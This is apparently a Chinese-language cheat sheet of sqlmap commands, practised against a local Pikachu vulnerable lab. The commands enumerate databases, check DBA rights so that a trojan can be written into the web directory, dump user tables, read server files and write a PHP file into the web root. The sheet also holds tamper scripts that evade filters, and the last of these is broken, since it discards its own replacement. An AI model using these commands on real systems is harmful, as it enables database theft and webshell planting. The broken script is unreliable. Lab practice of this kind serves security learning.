sqlmap -u 目标网址 (检测是否存在sql注入,如果存在并返回目标网址的数据库)
sqlmap -u 目标网址 --is-dba (检测是否存在dba权限,dba权限是可以把文件写到目录里面去,如果存在就可以把木马写到目录里)
sqlmap -u 目标网址 --dbs (把目标网址所有的数据库列出来)
sqlmap -u 目标网址 --current-db (查找当前数据库)
sqlmap -u 目标网址 --tables -D “数据库名” (查询数据库的所有表名,之后根据经验自己猜一下那个是含有用户信息的表名)
sqlmap -u 目标网址 --columns -T “数据库表名” -D “数据库名” (查询所有的字段名)
sqlmap -u 目标网址 --dump -D “数据库名” -T “数据库表名” -C “数据库字段名” (对目标用户信息进行暴力破解)
http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=111&submit=%E6%9F%A5%E8%AF%A2 --is-dba
python.exe .\sqlmap.py -u "http://127.0.0.1/pikachu/vul/sqli/sqli_str.php? name=111&submit=%E6%9F%A5%E8%AF%A2" --file-read D:\phpStudy\WWW\nice.php
python.exe .\sqlmap.py -u "http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=111&submit=%E6%9F%A5%E8%AF%A2" --file-write C:\1.php --file-dest D:\phpStudy\WWW\1.php
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOWEST #定义脚本的优先级
def dependencies(): #脚本适用范围
pass
def tamper(payload, **kwargs): #对payload的修改
return payload.replace(",", "/")
def tamper(payload, **kwargs): #对payload的修改
return payload.replace("select", "sselectelect")
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOWEST #定义脚本的优先级
import base64
def dependencies(): #脚本不适用范围
pass
def tamper(payload, **kwargs): #对payload的修改
for i in range(len(payload)):
if payload[i] == " ":
payload.replace(" ","/*|%20--%20|*/")
return payload